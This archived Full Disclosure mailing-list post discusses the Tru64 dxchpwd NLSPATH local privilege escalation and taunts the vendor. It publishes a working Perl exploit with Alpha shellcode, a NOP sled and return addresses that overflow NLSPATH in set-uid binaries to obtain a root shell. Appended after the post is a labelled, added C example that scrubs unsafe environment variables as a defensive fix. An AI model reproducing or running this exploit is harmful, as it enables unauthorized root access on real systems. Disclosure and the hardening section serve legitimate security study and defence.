Full Disclosure mailing list archives
In regards to ... http://online.securityfocus.com/bid/5382
From: full-disclosure () lists netsys com (KF)
Date: Mon, 5 Aug 2002 12:22:18 -0700
In regards to ... http://online.securityfocus.com/bid/5382 and
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README

- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why medium? Because the public had not seen an exploit?

This ECO has not been through an exhaustive field test process.
Due to the experimental stage of this ECO/workaround, Hewlett-Packard
makes no representations regarding its use or performance. The
customer shall have the sole responsibility for adequate protection
and back-up data used in conjunction with this ECO/workaround.

^--- hrmm cute.

I think I can make one of those right quick too.

This SNOSoft Proof of Concept Tool has not been through an exhaustive
field test process. Due to the experimental stage of this Tool, SNOSoft
makes no representations regarding its use or performance. The
customer of Compaq / HP shall have the sole responsibility for adequate protection
and back-up data used in conjunction with his or her own system and the use of the
following SNO/Proof of Concept Tool.

Official SNO workaround is:
See vendor or if paranoid chmod -s everything in sight.

This is supposed to be the vendor fix... I have not tested it. I assume with the
coordination from CERT and the conscious decision to release a public patch
that the vendor has provided a good workaround.

http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README

Please note after all the public drama with HP look whose name ends up in the credit section. *grin*
Good find guys... let's give the HP dev staff a round of applause. *sarcasm*

Tru64 DXCHPWD Local Privilege Escalation Vulnerability
Credit: Published in a Compaq security advisory.

Hrmm how nice of them to mention us.
I will give someone a cookie if they can tell me when NLSPATH was first a big issue on OTHER unix systems.

I hope this isn't broken... if it is don't whine to me ... fix it.

--- begin copyrighted material

#!/usr/bin/perl -w
#
# stripey (stripey () snosoft com)
#
# This code is copyrighted by Snosoft
# http://www.snosoft.com
# If you are a direct employee of HP or Compaq
# you are not allowed to look at this program or use it.
# in order to protect our copyright on this
# program we have crippled it (at least) by adding
# _IWORKATHP to some part of the code. If
# you do not work for HP or Compaq you may
# remove these letters at will provided this copyright notice
# remains attached to the header of this code.
# As stated above if you work at hp you should
# not even be reading at this point. However if
# you are please note that by removing the letters
# _IWORKATHP from this document you are violating
# the DMCA section 1201(a)
# Also please note that most of the targets in
# this are removed pending CERT releases.

$tgts{"0"} = pack("l",0x40010c04).":/usr/dt/bin/SORRY";
$tgts{"1"} = pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";
$tgts{"2"} = pack("l",0x40014280).":/usr/sbin/HRMMM";
$tgts{"3"} = pack("l",0x4003c190).":/usr/bin/LALALALAL";
$tgts{"4"} = pack("l",0x400361f0).":/usr/bin/HARHAR";
$tgts{"5"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";
$tgts{"6"} = pack("l",0x400120b0).":/usr/bin/OOPS";
$tgts{"7"} = pack("l",0x400105e8).":/usr/bin/DECLANR0X";

unless (($target,$offset,$align) = @ARGV,$align) {
    print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
    foreach $key (sort(keys %tgts)) {
        ($a,$b) = split(/\:/,$tgts{"$key"});
        print "\t$key. $b\n";
    }
    print "\n";
    exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);

# GOBBLES someday I will switch gears in the sweat shop and
# get that shellcode wrote up. That was quite the entertaining
# talk or speech or whatever this weekend.

# shellcode by Taeho Oh
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

$tlen = (1024-(length($sc)))/4;
$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;

$ENV{"NLSPATH"} = $buf;

if ($target == 7) { print "Hit ctrl-d...\n"; }

if ($target == 6) {
    exec("$b","-d","a=asdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");
} else {
    exec("$b");
}

---- end copyrighted material

-KF
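The bug class behind SSRT2262 is a set-uid program that trusts the caller's NLSPATH (a colon-separated list of message-catalog path templates) and copies it into a fixed buffer before catopen() ever runs. The program-side fix is independent of any vendor patch: drop search-path variables that a privileged process must never inherit, before the first library call that reads them. The following C is an added example, not part of KF's post, of the SNOSoft script, or of the Compaq/HP ECO; the variable list and the function names (running_privileged, scrub_unsafe_env, nlspath_looks_sane) are our own choices.

```c
/* Added example: environment hygiene for a set-uid program that uses
 * message catalogs. Not from the original post or the vendor patch. */
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Search-path variables a set-uid program must never take from its caller.
 * NLSPATH steers catopen() to caller-chosen catalog files and, in the bug
 * above, an over-long value overruns the program's own buffer. The list is
 * our own (assumption); sudo and OpenSSH keep similar lists. */
static const char *const unsafe_env_vars[] = {
    "NLSPATH",
    "LOCPATH",
    "LD_LIBRARY_PATH",
    "LD_PRELOAD",
    NULL
};

/* 1 if the process holds privileges its caller does not (set-uid/set-gid). */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Remove every unsafe variable from the environment. Returns how many were
 * actually present, so the caller can log that someone supplied one. */
int scrub_unsafe_env(void)
{
    int removed = 0;
    for (const char *const *v = unsafe_env_vars; *v != NULL; v++) {
        if (getenv(*v) != NULL) {
            unsetenv(*v);
            removed++;
        }
    }
    return removed;
}

/* For an unprivileged program that still wants to honour NLSPATH: accept
 * only a value that fits the buffer it will be copied into, carries no
 * control bytes, and whose colon-separated templates are all absolute.
 * Returns 1 when the value is acceptable, 0 otherwise. */
int nlspath_looks_sane(const char *value, size_t max_len)
{
    if (value == NULL)
        return 1;                      /* unset: the library default applies */
    size_t len = strlen(value);
    if (len == 0 || len > max_len)
        return 0;                      /* too long: the overflow case */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (c < 0x20 || c == 0x7f)
            return 0;                  /* embedded control byte */
    }
    const char *p = value;
    while (p != NULL && *p != '\0') {
        if (*p != '/')
            return 0;                  /* relative template, e.g. "msg/%N" */
        const char *colon = strchr(p, ':');
        p = colon ? colon + 1 : NULL;
    }
    return 1;
}

int main(void)
{
    /* Privileged helper: scrub before the first catopen()/setlocale(). */
    if (running_privileged())
        scrub_unsafe_env();
    return 0;
}
```

Call scrub_unsafe_env() as the very first thing in main(), before any library routine that might consult the environment; the return value is worth logging, since a non-zero count from a set-uid binary is a signal that someone tried to steer it. Modern C libraries already do part of this (glibc, for example, ignores NLSPATH in set-user-ID programs), but a program that must build on older systems like the Tru64 release in the advisory should not rely on that.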